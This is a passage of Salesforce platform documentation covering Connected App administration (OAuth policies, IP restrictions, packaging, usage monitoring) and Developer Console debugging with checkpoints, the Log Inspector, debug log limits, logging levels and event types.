After you’ve created the app, you can specify IP ranges by clicking New at IP Ranges. The IP ranges work with OAuth, not
SAML, and allow a developer to register the IP ranges their application uses to make requests from Salesforce. Enter a valid
IP address in the Start IP Address field and a higher IP address in the End IP Address field. You can enter multiple,
discontinuous ranges by clicking New to enter each range. Once the app is installed, each organization’s administrator can
approve or bypass the ranges by setting IP restrictions.

Packaging a Connected App

After creating a Connected App or a new version of an existing app, package it to make it available to users on other Salesforce
organizations. You can add a Connected App to a managed package in the same way as, and along with, other components
such as custom objects, Visualforce pages, or Apex classes. This makes it easy to distribute a Connected App to other Salesforce
organizations. As a packageable component, Connected Apps can also take advantage of all other features of managed packages,
such as listing on the AppExchange, push upgrades, post-install Apex scripts, license management, and enhanced subscriber
support.

Note:  You can only package a Connected App from a Developer Edition organization.

Deleting a Connected App

To delete a Connected App, click the Connected App Name in the list of apps. Click Delete on the editing page and confirm
by clicking Delete again. Even though the app is removed from your list, you cannot reuse the app name.
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If you delete a Connected App that has been included in a package, the app remains available in the package until you update
the package.

See Also:
Creating a Connected App
Connected Apps Overview

Viewing Connected App Details
The Connected App Detail page shows you information about the Connected App, including its version and scopes. You can
edit and check usage of the Connected App from here, and also associate profiles and permissions with this app.

• Click Edit to make changes to the app on the Connected App Edit page.

• Click View OAuth Usage to see the usage report for Connected Apps in your organization.

• Click Manage Profiles to select the profiles for this app from the Application Profile Assignment page. Select the
profiles to have access to the app.

Important:  This option won’t appear if the OAuth policy for Permitted Users is set to All users may
self-authorize because this option isn’t needed when users can authorize themselves.

• Click Manage Permission Sets to select the permission sets for the profiles for this app from the Application Permission
Set Assignment page. Select the permission sets to have access to the app.

Important:  This option won’t appear if the OAuth policy for Permitted Users is set to All users may
self-authorize because this option isn’t needed when users can authorize themselves.

• Click New in Service Provider SAML Attributes to create new attribute key/value pairs. You can also edit or delete existing
attributes.

Only the users belonging to at least one of the selected profiles or permission sets can run the app if you selected
Admin-approved users for the Permitted Users value on the Connected App Edit page. If you selected All Users
instead, profiles and permission sets are ignored.

Managing a Connected App
To view and update properties of a Connected App, find the app under Setup, in Manage Apps > Connected Apps and click
Edit next to it. To view and update details for the app, click the app’s name.

Editing a Connected App
Follow these steps to edit and review information about a Connected App:

1. From Setup, click Manage Apps > Connected Apps.
2. To edit an app, click Edit next to the name of the app you want to modify on the Connected Apps page.
3. To review information about an app, click the app name.
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• OAuth policies are available for every Connected App.

◊ Permitted Users determines who can run the app.

- All Users may self-authorize, the default, allows anyone in the organization to self-authorize the app.
This means each user has to approve the app the first time they access it. If you switch from All Users may
self-authorize to Admin-approved users are pre-authorized, anyone currently using the app loses
their access unless they belong to a permission set or profile you have specified for the app.

- Admin-approved users are pre-authorized limits access to those users with a profile or permission set
specified, but these users don’t need to approve the app before they can access it. You manage profiles for the app
by editing each profile’s Connected App Access list. You manage permission sets for the app by editing each
permission set’s Assigned Connected Apps list.

◊ IP Restrictions refers to the IP restrictions that the users of this Connected App are subject to. An administrator
can choose to either enforce or bypass these restrictions by choosing one of the following options.

- Enforce IP Restrictions – Default. A user running this app is subject to the organization’s IP restrictions,
such as IP ranges set in the user’s profile.

- Relax IP Restrictions with Second Factor – A user running this app bypasses the organization’s IP
restrictions if either of these conditions are true:

- The app has IP ranges whitelisted and is using the Web server OAuth authentication flow. Only requests coming
from the whitelisted IPs are allowed.

- The app has no IP range whitelist, is using the Web server or user-agent OAuth authentication flow, and the
user successfully completes Identity Confirmation.

- Relax IP Restrictions – A user running this app is not subject to any IP restrictions.

◊ Require Users to Log In specifies how frequently a user must log in to maintain the permissions their client
application needs from the connected app. You may specify that they only need to log in the first time they use the
app, every time they use it, after a certain period of inactivity, or after a certain period of time.

◊ The app’s current permissions are also listed here.

If your connected app is a canvas app that uses signed request authentication, be sure to:

◊ Set Permitted Users to Admin-approved users are pre-authorized.

◊ Set Require Users to Log In to The first time they use this application.

◊ Give users access via profiles and permission sets.

• Basic Information is available for all Connected Apps. However, if your connected app is a canvas app, then these field
values aren’t used. Instead, the canvas app URL that was specified when the connected app was created is used.

◊ Start URL is used if the Connected App uses single sign-on. In this case, set the URL to the page where the user
starts the authentication process. This location will also appear in the application switcher menu.

◊ Mobile Start URL is similar to Start URL, but used for mobile devices when Mobile Integration is specified.

• Mobile Integration settings are available for any Connected App that’s a mobile application.

◊ Session Timeout specifies how much time can pass while the app is idle before the app locks itself and requires the
PIN before continuing. Allowable values are none (no locking), 1, 5, 10, and 30 minutes.

◊ Pin Length sets the length of the identification number sent for authentication confirmation. The length can be
from 4 to 8 digits, inclusive.
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Monitoring Usage for a Connected App
To view information on the usage of any Connected Apps in the organization, from Setup, click Manage Apps > Connected
Apps OAuth Usage. For each Connected App in use, the table shows the name of the app, available actions, and the number
of users that have run the app. Connected Apps that are installed but not yet used by anyone don’t appear in the table.

Click the User Count to see usage information for that Connected App. For each user you’ll see:

• When they first used the app

• The last time they used the app

• The number of times they’ve used the app

You can revoke access for individual users with the Revoke action on the user’s row. Click the Revoke All button at the
top of the report to revoke access for everyone using the Connected App.

Uninstalling a Connected App
You remove a Connected App from your organization by uninstalling the package the app is part of.

Note:  When a Connected App is uninstalled, the access and refresh tokens of all users of the application are removed.
This prevents a user from running the application later, using an existing access token, without explicitly approving
the application themselves.

DEBUG

Debugging Your Code
This section contains information about debugging the code that you’ve written.

• Checkpoints Tab

• Checkpoint Inspector

• Logs Tab

• Log Inspector

• Examples of Using the Log Inspector

• Using Debug Logs
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DEBUGGING USING THE DEVELOPER CONSOLE

Checkpoints Tab
The Checkpoints tab displays a list of saved checkpoints that preserve a snapshot of the state of objects in memory at the time
the checkpoint was reached.

Checkpoints

This list displays the checkpoints currently available for review. Select Debug > My Current Checkpoints Only to only display
checkpoints you’ve created since opening the Developer Console. Deselect this option to display all checkpoints currently
saved for your organization, including newly-generated ones created by other users.

Each checkpoint in the list displays this information:

DescriptionColumn

The namespace of the package containing the checkpoint.Namespace

The Apex class containing the checkpoint.Class

The line number marked with the checkpoint.Line

The time the checkpoint was reached.Time

Right click any column header to sort the information in the column. You can also select which columns you want displayed
in the Checkpoints list.

To open a checkpoint, double-click it. The checkpoint opens in the Checkpoint Inspector.

Checkpoint Locations

This list provides the location of each checkpoint in the source code. Each item in the list displays this information:

DescriptionColumn

The name of the Apex class that contains the checkpoint.File

The line number marked with the checkpoint.Line

If the checkpoint is in a loop, this value indicates the iteration at which the checkpoint is captured.Iteration

3723

Checkpoints TabDebugging Using the Developer Console



By default, the iteration is 1, which means that the checkpoint is saved the first time the line of source code executes. You can
use a different iteration, for example, to investigate why a loop does not terminate when expected. To change the iteration,
click the cell you want to change and enter a new number. Only one checkpoint will be captured for a specific line of code,
no matter how many times it’s executed during a request.

Set checkpoints locations from the Source Code Editor. Checkpoint locations persist until you click Clear or until you close
the Developer Console.

See Also:
Checkpoint Inspector
Setting Checkpoints in Apex Code
Overlaying Apex Code and SOQL Statements
Using the Developer Console

Setting Checkpoints in Apex Code
Use Developer Console checkpoints to debug your Apex classes and triggers. You can’t set checkpoints in Visualforce markup.

Important:  To use checkpoints, the Apex Log Level must be set to Finer or Finest. See Setting Logging Levels.

To set a new checkpoint:

1. Open the Apex class or trigger in the Source Code Editor.
2. Click in the margin to the left of the line number where you want to set the checkpoint. Up to five checkpoints can be

enabled at the same time.

Results for a checkpoint will only be captured once, no matter how many times the line of code is executed. By default,
the results for a checkpoint are captured immediately before the first time the line of code is executed. You can change the
iteration for the capture from the Checkpoint Locations list on the Checkpoints tab. You can also overlay Apex code and
SOQL statements that run when code executes at a checkpoint.

3. Execute the code with the Developer Console open.
4. View your checkpoints and results on the Checkpoints tab.

Checkpoints persist until you click Debug > Clear Checkpoint Locations.

Note:  If you set a checkpoint in a method with the @future annotation, you must keep the Developer Console
open until the @future method completes asynchronously.

See Also:
Log Inspector
Overlaying Apex Code and SOQL Statements
Checkpoints Tab
Checkpoint Inspector
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Overlaying Apex Code and SOQL Statements
Use the Developer Console to overlay diagnostics that run when Apex code executes at a checkpoint, without changing any
code.

See Setting Checkpoints in Apex Code.

When troubleshooting a runtime issue, you might want information about the state of a variable or the state of the database.
You might also want to create a specific condition in which to test your code. The Developer Console allows you to overlay
Apex code and SOQL statements that run when code executes at a checkpoint.

1. Set checkpoints and execute your code, then go to the Checkpoints tab.
2. Select a checkpoint and click Edit Properties.
3. Select SOQL or Apex Code. To run the diagnostic code without generating a heap dump at the checkpoint, deselect

Dump Heap.

4. Enter SOQL or Apex code in the Action Script box and click OK.

Note:

You can’t refer to local objects because an anonymous block is a new stack frame. Refer to static objects or create
new objects. Also, you can't use bind variables in SOQL queries used in overlays.

The results of the overlayed code will appear on a separate Query Results or Apex Execution Results tab in the Checkpoint
Inspector. For details on navigating query results, see Query Editor.

Note:  On the Apex Execution Results tab, the value -1 indicates that a field is not applicable.

See Also:
Setting Checkpoints in Apex Code
Checkpoints Tab
Checkpoint Inspector
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Checkpoint Inspector
Use checkpoints to investigate the objects in memory at a specific point of execution and see the other objects with references
to them.

Go to the Checkpoints tab and double-click a checkpoint to view the results in the Checkpoint Inspector. The Checkpoint
Inspector provides more details on variables than the Log Inspector, including individual items in collections.

The Checkpoint Inspector has two tabs:

• The Heap tab displays all objects in memory at the time the line of code at the checkpoint was executed. Items are listed
and grouped by data type.

◊ The Types column is a flat list of the classes of all instantiated objects in memory at the checkpoint, with a count of
how many are instantiated, and the amount of memory consumed in bytes. Click an item to see a list of those objects
in the Instances column, with their address in the heap and memory consumed. Click an instance to view the variables
currently set in that object in the State column.

◊ The References tab provides two lists to display relationships between symbols held in memory. Use the Inbound
References list to locate the symbols that can hold references to objects of a particular type. Use the Referencing Instances
list to find specific instances holding references to a symbol. Double click to find that instance elsewhere in the heap.

◊ The Search tab lets you find symbols in the heap by value or address. Search matches partial symbol values, but addresses

must be exact. To quickly search for a value, click the search icon ( ) that appears to the right of it when you hover
over it in the State panel.

• The Symbols tab displays a tree view of all symbols in memory at the checkpoint. Use it to quickly review the state of the
system at the specific line of code (and iteration) where the checkpoint was set.
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Important:  If you don’t see scroll bars in the Checkpoint Inspector panels on a Mac, open System Preferences >
General and set Show scroll bars to Always.

See Also:
Checkpoints Tab
Setting Checkpoints in Apex Code
Overlaying Apex Code and SOQL Statements

Logs Tab
Use the Logs tab in the Developer Console to access logs that include database events, Apex processing, workflow, callouts,
and validation logic.

The Developer Console automatically polls for the current user’s debug logs and lists them on the Logs tab. For example, if
you have validation rules associated with inserting a record, and you insert a new record, the Developer Console captures a
debug log for the request and adds it to the list.

• To open the selected log in the Log Inspector, click File > Open Log or double-click the log on the Logs tab. Use the
Log Inspector to review a debug log, evaluate Apex code, track DML, monitor performance, and more.

• To open the selected log in a text editor, click File > Open Raw Log.
• To filter the visible logs, click Filter and type the text you want included in the list. For example, if you want to see debug

logs from a specific user, type that user's name. The filter is case-sensitive.
• To remove all logs from the list, click Debug > Clear > Log Panel.
• By default, the Logs tab displays only new logs generated by the current user. To see all debug logs saved for your

organization, including newly-generated logs created by other users, click Debug and deselect Show My Current Logs
Only.

• To automatically hide all existing logs the next time the page is refreshed, click Debug and select Auto-Hide Logs.
• To download a copy of the selected log as a text file, click File > Download Log. The default name for the file is apex.log.

Note:  User logs are configured from the Debug Log page in your org. From Setup, click Monitoring > Debug Logs
or Logs > Debug Logs.

Setting Logging Levels

Logging levels determine how much request information is saved in a debug log. Parsing a large log can take a long time. To
reduce the size of a log, adjust the logging level. Use verbose logging for code you’re reviewing. Use terse logging for code
you’re not interested in.

To specify logging levels for future requests, click Debug > Change Log Levels. If you are debugging using checkpoints, set
the Apex Code logging level to Finer or Finest. For details on what each setting controls, see Debug Log Categories and
Debug Log Levels.

To fine-tune log verbosity at the trigger or class level, you can set debug log filters for Apex classes and triggers.
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Important:  If the Developer Console is open, the log levels in the Developer Console affect all logs, including logs
created during a deployment. Before running a deployment, verify that the Apex Code log level is not set to Finest,
or the deployment might take longer than expected.

See Also:
Debug Menu
Log Inspector
Setting Debug Log Filters

Log Inspector
The Log Inspector is a context-sensitive execution viewer that shows the source of an operation, what triggered the operation,
and what occurred afterward. Use this tool to inspect debug logs that include database events, Apex processing, workflow, and
validation logic.

Log Inspector Perspectives

The panels displayed in the Log Inspector depend on the selected perspective. To switch perspectives, click Debug > Switch
Perspective.

The following perspectives are predefined:

• All (default)

• Debug: A perspective designed for code debugging that includes the Execution Log, Source and Variables panels.
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• Log Only: An all-purpose perspective for viewing log execution that includes the Execution Log panel only.

• Analysis: A perspective designed for log analysis that includes the Stack Tree, Execution Stack, Execution Log, and
Execution Overview panels.
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Use a perspective that makes completing your task fast and easy. Every developer has a different style; if one of the predefined
perspectives doesn’t meet your needs, it’s easy to design your own.

Log Panels

The Log Inspector can contain any of the following panels:

• Stack Tree
• Execution Stack
• Execution Log
• Source
• Variables
• Execution Overview

Click Debug > View Log Panels or CTRL+P to choose from available panels and design a custom perspective.

If you design a custom perspective you want to use again, click Debug > Save Perspective and give it a memorable name.
After a custom perspective is saved, you can select it any time you use the Log Inspector by clicking Debug > Switch Perspective.

Most panels refresh automatically to display information when you click on an item in a related panel. For example, if you
click a folder in the Stack Tree panel, the Execution Stack, Execution Log and Source panels are updated to display information
about the related object. Similarly, if you click a line in the Execution Log, the Stack Tree, Execution Stack, and Source panels
are all updated with details on that line. Clicking an item in the Executed Units tab in the Execution Overview updates the
Execution Log, Stack Tree, Execution Stack, and Source panels.
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Stack Tree

The Stack Tree panel displays two tree views that display information “top down” — from initiating calls to the next level
down, which allows you to see the hierarchy of items in a process. For example, if a class calls a second class, the second class
displays as a child node of the first class.

The Execution Tree displays each operation. For example, if a for loop calls System.debug() 8 times, the Execution Tree
shows the duration of each call:

The Performance Tree aggregates operations to give you a better look at the performance of an operation as a whole. Using
the same example as above, the Performance Tree displays the total duration of every call to debug:

This log was generated from the Execute Anonymous Window. Calls to debug and other methods from other locations in
your code are aggregated in the executed unit.

Each section in the Stack Tree panel includes this information:

DescriptionColumn

Delimited region within the process, such as workflow, a class, or DML.Scope

Name of the item (region).Unit

Amount of time (in milliseconds) the item took to run.Duration

Amount of heap (in bytes) the item used.Heap

Number of times the item was called.Iterations

Execution Stack

The Execution Stack panel displays a “bottom-up” view of the currently-selected item in the debug log, starting with the
lowest level call, followed by the operation that triggered that call, and so on.
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Execution Log

The Execution Log panel contains the debug log for the current process. The debug log contains every action that occurred
in the process, such as method calls, workflow rules, and DML operations. To view long lines that are truncated in the view,
hover over the line to display a popup.

Use the Execution Log to retrace steps through a process. You can step through lines on your own or filter the log to lines of
specific interest:

• This Frame: Displays only this region of the process, or only the items that are associated with the level. For example, if
you select a trigger that calls a class, only the trigger operations are displayed. If you click CODE_UNIT_STARTED and select
This Frame, only the items in the process that occur between CODE_UNIT_STARTED and its associated CODE_UNIT_ENDED
are displayed.

• Executable: Displays only the executable items in the debug log. This hides the cumulative limits information, such as
the number of SOQL queries made, the number of DML rows, and so on.

Tip:  Always leave Executable checked. Only deselect it when you are working on optimizing your process and
need specific limits information.

• Debug Only: Displays only the debug statements you have added to the code.
• Filter: Displays items that match what you enter in the associated field. For example, if you select Filter and type DML,

only the lines in the execution log with the string “DML” in either the event or details are displayed. The filter is
case-sensitive.

The Execution Log panel contains this information:

DescriptionColumn

System time when the process began, shown in the local user's time. The format is: HH:MM:SS:MSS.Timestamp

The Debug eventEvent

Additional details pertaining to the event, such as line number and parameters.Details

Source

The Source panel contains the executed source code or the metadata definitions of entities used during the process, and lists
how many times a line of code was executed. The content displayed in the panel depends on what's selected elsewhere in the
view.

To go to a specific line of code, enter a line number in the entry box at the bottom of the source panel and click Jump.
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Click Open to open executed source code in Source Code Editor view.

Note:  If validation rules or workflow are executed during the process, the metadata representation displays in the
source panel. You can’t open a metadata representation from the Developer Console. See ValidationRule and
Workflow in the Force.com Metadata API Developers Guide.

Variables

Use the Variables panel to discover when a variable is assigned a value and what that value is. Click on a Variable event to
populate the section.

Note:  The Apex Code log level must be set to Finest for variable assignments to be logged.

Another way to view the contents of variables is to use checkpoints, which allow you to see more details about entities held
in memory at a point of execution. For details, see Setting Checkpoints in Apex Code.

Execution Overview: Executed Units, Limits, and Timeline

The Execution Overview panel at the bottom of the Log Inspector contains three tabs:

• The Executed Units tab displays the system resources used by each item in the process.

The buttons at the bottom of the tab can be used to filter out information by item type. For example, if you don’t want to
view details for methods, click Methods. Click the button a second time to clear the filter.

The Executed Units tab contains the following information:

DescriptionColumn

Type of process item. Types include:What
◊ Method
◊ Queries
◊ Workflow
◊ Callouts
◊ DML
◊ Validations
◊ Triggers
◊ Pages

Name of the process item.Name

Total duration for the item.Sum

Average duration for the item.Avg

Maximum duration for the item.Max
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DescriptionColumn

Minimum duration for the item.Min

Number of times the item was called during the process.Count

Amount of space the item took on the heap.Heap

Type of query. Possible values are:Query Type
◊ SOQL
◊ SOSL

Total number of records changed for the item.Sum rows

Average number of records changed for the item.Avg rows

Maximum number of records changed for the item.Max rows

Minimum number of records changed for the item.Min row

To sort information by a specific column, click the column header.

• The Limits tab displays overall system limits by name and amount used and contains this information:

DescriptionColumn

Name of the limit.Limit

Amount of the limit used by this process at this point of execution.Used so far

Amount of this limit used by the request at completion.Request Total

Total amount for the limit.Total Available

• The Timeline tab provides a visual representation of the time taken by each process. Select the Scale option that results
in the most useful view.

The Timeline tab contains this information:

DescriptionColumn

Type of process.Category

Milliseconds of time taken by the process.Millis

Percent the process took of the entire request.%
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Important:  If you are using a Mac and you don’t see scroll bars in the Log Inspector panels, open System Preferences
> General and set Show scroll bars to Always.

See Also:
Debug Menu
Logs Tab
Managing Perspectives in the Log Inspector
Creating Custom Perspectives in the Log Inspector

Examples of Using the Log Inspector
Here are some of the ways you can use the Log Inspector to diagnose and solve problems.

• Tracing the Path of Execution

• Viewing System.Debug Statements

• Updating Source Code

• Tracking DML in a Request

• Evaluating the Performance of a Visualforce Page

• Viewing a Complex Process

Tracing the Path of Execution

Scenario: You’ve opened a debug log in the Log Inspector. What are some of the ways to step through the information?

1. In the Execution Log panel, select Executable to filter out all non-executable steps, including cumulative limits
information.

2. In the Execution Overview panel, click the Executed Units tab to view the aggregate values of different types of
operations in the request. For example, you can view the number of DML operations or the different methods by
the type of method.

3. Click the Limits tab to view the governor limits used by this operation.

Viewing System.Debug Statements

Scenario: You’ve added a number of System.Debug statements to your code to track a request's progress. How do you
find them using the Log Inspector?

1. In the Execution Log panel, select Filter.
2. Enter DEBUG (upper-case) in the entry box.

Only the lines containing the string DEBUG are shown in your request display.

Updating Source Code

Scenario: After you run your request, you notice an Apex code error in the debug log. What's the easiest way to edit
your Apex code?

1. From the Source panel, select the line of code.
2. Click Open.
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The class or trigger opens in a new Source Code Editor tab.

Tracking DML in a Request

Scenario: Your request contains many DML statements in different locations. How can you tell how many times DML
is executed in a request?

Here are two techniques for drilling into a debug log to examine the actual DML executed during the course of a request:
1. In the Execution Log panel, select Filter, then type DML. All items in the request that contain DML anywhere in

either the event or details display.
2. In the Execution Overview panel, click the Executed Units tab and disable all other types of execution, except for

DML. The buttons are toggles—click once to filter that type of operation out of the list. Click again to disable the
filter. To view only the DML, click Methods, Queries, Workflow, Callouts, Validations, Triggers and Pages.

• The details of the DML operation show the kind of object that was affected, and the specific operation
performed—insert, update, and so on. You can also view the number of times a DML statement was executed,
the number of rows, and so on.

• If you click a DML request item in the Executed Units tab, the Execution Log filters out all other parts of the
request and displays only that DML statement.

You can also use these procedures for looking up and filtering queries.

Evaluating the Performance of a Visualforce Page

Scenario: You have a Visualforce page and an Apex controller that executes SOQL queries. How do you analyze the
performance of your page and find out which code unit took the most time? How do you determine how many queries
are performed in the request? How do you verify how close you are getting to governor limits?

1. In the Stack Tree panel, look for the name of the Visualforce page. The top level has the format /apex/pagename.
The first node under that shows the actual execution of the page. Open that node to see when the controller was
initialized.

2. Continue to open nodes to explore the calling of methods and how long each method took. When you click an item
in the Stack Tree panel, the Execution Log panel displays that portion of the debug log, the Source panel refreshes
to display the appropriate source code, and the Variables panel shows the variables that are in context.

3. In the Execution Overview panel, click the Executed Units tab to view statistics of your code that include execution
time in milliseconds and heap size in bytes. The Cnt column shows the number of times a certain code unit has been
executed. If a code unit was executed more than once, the sum, average, maximum, and minimum run times are
updated. Similarly, if a query is executed more than once, the display is updated to summarize the aggregate numbers
of returned rows.

You can filter out code units by clicking the buttons on the bottom that correspond to the code units you want to
omit from the view. Tracking DML in a Request explains how to do this.
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4. Click the Limits tab to verify the applicable limits, and how close your request is to each applicable limit. The Total
Available column shows the governor limits allowed for your organization per type of operation. The Request Total
column shows the total number of requests performed. The Used So Far column shows the number of requests
consumed at the point of execution you selected in the stack trace or execution log.

5. Click the Timeline tab to see a visual display of the executed code units broken up by the type of code unit, in addition
to the total and percentage of execution time for each type of code unit. The timeline lets you quickly find out which
parts of the request took the longest. Select a time interval at the bottom of the summary section to increase or
decrease the period displayed in the timeline.

In this example, database requests took the most time (56.95%). They are followed by the Visualforce page. The
least amount of time was spent on Apex code. Also, Visualforce pages and Apex code were executed first and last,
while database operations were carried out between them.

Viewing a Complex Process

Scenario: Your process is complex, and includes several Apex classes and triggers, workflow, and validation rules. What
are some of the best ways to step through or filter the resulting debug log?

1. The Stack section contains a tree structure illustrating the execution path of all the top level items in the request.
Use this to see the hierarchy of items as they execute.

2. Use the Filter entry box in the execution log. For example, if you’re interested in trigger-specific events, click Filter
and enter trigger. Only the lines in the debug log that contain the word trigger display in the execution log
section.

3. Limit the scope of the Execution Log tab to a specific selected unit of execution by selecting This Frame. For
example, if you select a line that contains CODE_UNIT_STARTED in the execution log, and then click This Frame,
the execution log displays only the items in the request that occur between CODE_UNIT_STARTED and its associated
CODE_UNIT_ENDED.

Note:  When This Frame is selected, the Execution Log only displays the items that are contained in that
frame, not any lower level operations. For example, if a trigger calls a class, only the trigger operations display
in the Execution Log, not the class operations.

3737

Log InspectorDebug



LOG INSPECTOR PERSPECTIVES

Creating Custom Perspectives in the Log Inspector
A perspective is a predefined layout of panels in the Developer Console Log Inspector.

When you perform a task in the Log Inspector, use a perspective that makes completing the task fast and easy. Every developer
has a different style. For a list of out-of-the box perspectives, see Log Inspector.

To create a custom perspective or modify an existing perspective:

1. In the Developer Console, open a log in the Log Inspector.
2. Click Debug > View Log Panels and select the panels you want to include in the perspective.

For a list of available panels, see Log Panels. If you modify a perspective, an * is appended to the perspective name until it
is saved.

Tip:  If you create a perspective that includes the Execution Log panel, you may want to include the Source
panel.

3. To save your changes, click Save Perspective. To create a new perspective, click Save Perspective As and enter a new
name.

See Also:
Log Inspector
Managing Perspectives in the Log Inspector

Managing Perspectives in the Log Inspector
A perspective is a predefined layout of panels in the Developer Console Log Inspector.

When you perform a task in the Log Inspector, make sure you choose the right perspective for the job. For a list of out-of-the
box perspectives, see Log Inspector.

To manage your perspectives, click Debug > Perspective Manager.

• To switch to a different perspective, double-click the perspective name, or select it and click Open.

• To change the default perspective, select the perspective name and click Set Default.
• To delete a perspective, select the perspective name and click Delete.
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• To create a custom perspective, see Creating Custom Perspectives in the Log Inspector.

See Also:
Log Inspector
Creating Custom Perspectives in the Log Inspector

DEBUG LOGS

Using Debug Logs
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

The Salesforce user interface, Email Services, and Approvals are not available in Database.com.

User Permissions Needed

“View All Data”To use the Developer Console:

“Author Apex”To execute anonymous Apex:

“Author Apex”To save changes to Apex classes and triggers:

“Customize Application”To save changes to Visualforce pages and components:    

A debug log can record database operations, system processes, and errors that occur when executing a transaction or running
unit tests. Debug logs can contain information about:

• Database changes

• HTTP callouts

• Apex errors

• Resources used by Apex

• Automated workflow processes, such as:

◊ Workflow rules

◊ Assignment rules

◊ Approval processes

◊ Validation rules

The system generates a debug log every time a transaction that is included in the defined filter criteria is executed.

Transactions can be generated from the following:

• Salesforce user interface
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• API

• executeanonymous calls

• Web services

• Email services

The filter criteria set for the user, the Developer Console or the API header determines what is included in the debug log.

Note:  Debug logs don’t include transactions that are triggered by lead conversion. For example, suppose a converted
lead triggers a workflow rule. The debug log won’t show that this workflow rule fired.

The following are examples of when to use a debug log:

• As a developer creating a custom application, you can use the debug log to validate the application's behavior. For example,
you can set the debug log filter to check for callouts, then in the debug log, view information about the success and duration
of those callouts.

• As an administrator for an organization, you can use the debug log to troubleshoot when a user reports difficulties. You
can monitor the debug logs for the user while they step through the related transaction, then use the debug log to view the
system details.

Debug Log Limits

The following are the limits for debug logs:

• Once a user is added, that user can record up to 20 debug logs. After a user reaches this limit, debug logs stop being recorded
for that user. Click Reset on the Monitoring Debug logs page to reset the number of logs for that user back to 20. Any
existing logs are not overwritten.

• Each debug log can only be 2 MB. Debug logs that are larger than 2 MB are reduced in size by removing older log lines,
such as log lines for earlier System.debug statements. The log lines can be removed from any location, not just the start
of the debug log.

• Each organization can retain up to 50 MB of debug logs. Once your organization has reached 50 MB of debug logs, the
oldest debug logs start being overwritten.

Debug Log Truncation

In order to provide the most pertinent information, debug logs are truncated starting with the oldest log entries. The newest
log entries are always preserved. The debug log is truncated by 200 KBytes when it reaches its maximum size of 2 MB.

The following events are necessary for processing the debug log and are associated with non-deletable log entries:

• EXECUTION_STARTED

• EXECUTION_FINISHED

• CODE_UNIT_STARTED

• CODE_UNIT_FINISHED

• METHOD_ENTRY

• METHOD_EXIT

• CONSTRUCTOR_ENTRY

• CONSTRUCTOR_EXIT

• SOQL_EXECUTE_BEGIN

• SOQL_EXECUTE_END

• SOSL_EXECUTE_BEGIN

• SOSL_EXECUTE_END

• CALLOUT_REQUEST
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• CALLOUT_RESPONSE

• FATAL_ERROR

Note:  Log entries for events that are necessary for processing the debug log don't get truncated and will always be
part of the debug log, but other log information that appears between the start and end lines of these log entries is
removed as part of log truncation.

See Also:
Searching a Debug Log

Setting Debug Log Filters
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“View All Data”To use the Developer Console:

“Author Apex”To execute anonymous Apex:

“Author Apex”To save changes to Apex classes and triggers:

“Customize Application”To save changes to Visualforce pages and components:    

When using the Developer Console or monitoring a debug log, you can specify the level of information that gets included in
the log.

Log category

The type of information logged, such as information from Apex or workflow rules.

Log level

The amount of information logged.

Event type

The combination of log category and log level that specify which events get logged. Each event can log additional
information, such as the line and character number where the event started, fields associated with the event, duration of
the event in milliseconds, and so on.

Debug Log Categories

You can specify the following log categories. The amount of information logged for each category depends on the log level:

DescriptionLog Category

Includes information about database activity, including every data manipulation
language (DML) statement or inline SOQL or SOSL query.

Database
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DescriptionLog Category

Includes information for workflow rules, such as the rule name, the actions taken, and
so on.

Workflow

Includes information about validation rules, such as the name of the rule, whether the
rule evaluated true or false, and so on.

Validation

Includes the request-response XML that the server is sending and receiving from an
external Web service. This is useful when debugging issues related to using Force.com
Web services API calls.

Callout

Includes information about Apex code and can include information such as log
messages generated by DML statements, inline SOQL or SOSL queries, the start

Apex Code

and completion of any triggers, and the start and completion of any test method, and
so on.

Includes cumulative profiling information, such as the limits for your namespace, the
number of emails sent, and so on.

Apex Profiling

Includes information about Visualforce events, including serialization and
deserialization of the view state or the evaluation of a formula field in a Visualforce
page.

Visualforce

Includes information about calls to all system methods such as the System.debug
method.

System

Debug Log Levels

You can specify the following log levels. The levels are listed from lowest to highest. Specific events are logged based on the
combination of category and levels. Most events start being logged at the INFO level. The level is cumulative, that is, if you
select FINE, the log will also include all events logged at DEBUG, INFO, WARN and ERROR levels.

Note:  Not all levels are available for all categories. Only the levels that correspond to one or more events are available.

• ERROR
• WARN
• INFO
• DEBUG
• FINE
• FINER
• FINEST

Important:  Before running a deployment, verify that the Apex Code log level is not set to FINEST. If the Apex
Code log level is set to FINEST, the deployment might take longer than expected. If the Developer Console is open,
the log levels in the Developer Console affect all logs, including logs created during a deployment.

Debug Event Types

The following is an example of what is written to the debug log. The event is USER_DEBUG. The format is timestamp |
event identifier:
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• timestamp: consists of the time when the event occurred and a value between parentheses. The time is in the user's time
zone and in the format HH:mm:ss.SSS. The value represents the time elapsed in nanoseconds since the start of the request.
The elapsed time value is excluded from logs reviewed in the Developer Console.

• event identifier: consists of the specific event that triggered the debug log being written to, such as SAVEPOINT_RESET or
VALIDATION_RULE, and any additional information logged with that event, such as the method name or the line and
character number where the code was executed.

The following is an example of a debug log line.

Figure 21: Debug Log Line Example

In this example, the event identifier is made up of the following:

• Event name:

USER_DEBUG

• Line number of the event in the code:

[2]

• Logging level the System.Debug method was set to:

DEBUG

• User-supplied string for the System.Debug method:

Hello world!

The following example of a log line is triggered by this code snippet.

Figure 22: Debug Log Line Code Snippet

The following log line is recorded when the test reaches line 5 in the code:

15:51:01.071 (55856000)|DML_BEGIN|[5]|Op:Insert|Type:Invoice_Statement__c|Rows:1

In this example, the event identifier is made up of the following:
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• Event name:

DML_BEGIN

• Line number of the event in the code:

[5]

• DML operation type—Insert:

Op:Insert

• Object name:

Type:Invoice_Statement__c

• Number of rows passed into the DML operation:

Rows:1

The following table lists the event types that are logged, what fields or other information get logged with each event, as well
as what combination of log level and category cause an event to be logged.

Level LoggedCategory LoggedFields or Information Logged With EventEvent Name

FINESTApex CodeNumber of bytes allocatedBULK_HEAP_ALLOCATE

INFO and aboveCalloutLine number, request headersCALLOUT_REQUEST

INFO and aboveCalloutLine number, response bodyCALLOUT_RESPONSE

ERROR and aboveApex CodeNoneCODE_UNIT_FINISHED

ERROR and aboveApex CodeLine number, code unit name, such as
MyTrigger on Account trigger
event BeforeInsert for [new]

CODE_UNIT_STARTED

DEBUG and aboveApex CodeLine number, Apex class ID, the string
<init>() with the types of parameters, if
any, between the parentheses

CONSTRUCTOR_ENTRY

DEBUG and aboveApex CodeLine number, the string <init>() with the
types of parameters, if any, between the
parentheses

CONSTRUCTOR_EXIT

INFO and aboveApex ProfilingNoneCUMULATIVE_LIMIT_USAGE

